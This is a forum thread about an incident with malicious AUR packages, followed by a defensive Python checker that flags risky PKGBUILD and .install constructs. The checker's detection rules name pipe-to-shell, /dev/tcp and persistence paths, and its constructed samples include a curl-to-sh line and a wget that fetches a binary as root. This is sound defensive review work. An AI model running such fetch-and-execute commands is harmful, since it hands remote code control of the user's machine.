Nemeski@mander.xyz to Linux@programming.dev · 2 days ago
Active AUR malicious packages incident (archlinux.org)
27 comments · 104 up / 0 down
Equinox1289@sh.itjust.works · 2 days ago · 8 up / 2 down
This is why I prefer Flatpaks, or really any application sandboxing.

Ooops@feddit.org · 1 day ago · 7 up
People not even checking the PKGBUILDs will also not check sandboxed applications to see if it was actually done properly…

9tr6gyp3@lemmy.world · 1 day ago · 6 up
AUR packages can be sandboxed with many different solutions. Any package can be sandboxed really.

Default Username@lemmy.dbzer0.com · 1 day ago (edited) · 9 up
This attack was executed by a script running in the PKGBUILD itself. You didn’t have to run the application to be infected since just building it will infect your machine.

patlefort@lemmy.world · 22 hours ago · 2 up
It also had an install script that will be run as root when the package is installed. Can’t sandbox that.

9tr6gyp3@lemmy.world · 1 day ago · 3 up
Yeah, I bet the build process could also be sandboxed, but I’m sure it’s not the default.

Default Username@lemmy.dbzer0.com · 1 day ago · 4 up
Sandboxing the build process would be a process. Nix already does it, for example. Many AUR packages don’t include a full list of dependencies.
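The two points the thread makes, that every function in a PKGBUILD runs as the building user the moment makepkg is invoked and that .install hooks run as root at install time, are why the files themselves need a read before building. As an added example from the reviewer's side (not code from the incident write-up, from Arch Linux, or from any commenter), here is a small Python pre-build checker that flags the constructs worth looking at first in both files. The rule list and both sample files are constructed for this example; the download lines in them stand in for "a script in the PKGBUILD" and "an install hook running as root" and are not taken from the real packages.

```python
"""Pre-build reviewer for an AUR PKGBUILD and its .install file.

Added example, not code from the incident write-up, from Arch Linux or
from any commenter. PKGBUILD functions run as the building user as soon
as makepkg starts; .install hooks run as root at install time. This
flags the constructs a reviewer most wants to read first; it is a
review aid, not a substitute for reading the file.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Finding:
    file: str      # which file the line came from
    line_no: int   # 1-based line number
    rule: str      # name of the rule that fired
    line: str      # the offending line, stripped


# Rule list constructed for this example; extend for your own review process.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\b[^\n]*(-d|--decode)\b")),
    ("eval", re.compile(r"(^|[;&|\s])eval\s")),
    ("dev-tcp", re.compile(r"/dev/(tcp|udp)/")),
    ("persistence-path", re.compile(r"(\.bashrc|\.profile|/etc/cron|systemd/(system|user)|autostart)")),
    ("inline-interpreter", re.compile(r"\b(python[23]?|perl|ruby)\s+-[ce]\b")),
    ("unpinned-checksum", re.compile(r"^\s*(sha\d+sums|md5sums|b2sums)\s*=\s*\(.*'SKIP'")),
    ("insecure-source", re.compile(r"^\s*source\s*=.*\bhttp://")),
]

# .install hooks run as root, so any download or network tool there is a
# finding on its own, even without a pipe into a shell.
INSTALL_RULES: List[Tuple[str, "re.Pattern"]] = [
    ("network-as-root", re.compile(r"\b(curl|wget|nc|ncat|socat|git\s+clone)\b")),
]


def _strip_comment(line: str) -> str:
    """Drop a trailing shell comment (naive: ignores '#' inside quotes)."""
    return re.split(r"(?<!\\)#", line, maxsplit=1)[0]


def scan_text(name: str, text: str, rules: List[Tuple[str, "re.Pattern"]]) -> List[Finding]:
    """Return one Finding per (line, rule) hit, in file order."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = _strip_comment(raw)
        for rule, regex in rules:
            if regex.search(line):
                findings.append(Finding(name, line_no, rule, raw.strip()))
    return findings


def review(pkgbuild: str, install: Optional[str] = None) -> List[Finding]:
    """Scan a PKGBUILD and, if present, its .install file."""
    findings = scan_text("PKGBUILD", pkgbuild, RULES)
    if install is not None:
        findings += scan_text(".install", install, RULES + INSTALL_RULES)
    return findings


# Both samples are constructed for this example.
SAMPLE_PKGBUILD = """\
# Maintainer: constructed example
pkgname=example-tool
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  # constructed payload marker, not taken from the real incident
  curl -s https://example.invalid/setup.sh | sh
}
"""

SAMPLE_INSTALL = """\
post_install() {
  systemctl daemon-reload
  # constructed: fetches a binary at install time, as root
  wget -qO /usr/local/bin/helper https://example.invalid/helper
  chmod +x /usr/local/bin/helper
}
"""

if __name__ == "__main__":
    for f in review(SAMPLE_PKGBUILD, SAMPLE_INSTALL):
        print(f"{f.file}:{f.line_no}: [{f.rule}] {f.line}")
```

Run it over the files an AUR helper has fetched before letting makepkg touch them; on the constructed samples it reports the unpinned checksum and the pipe-to-shell in package(), and the root-time download in post_install. A hit is a prompt to read that line in context, not a verdict, and a clean run says nothing about what the package's own sources do once built.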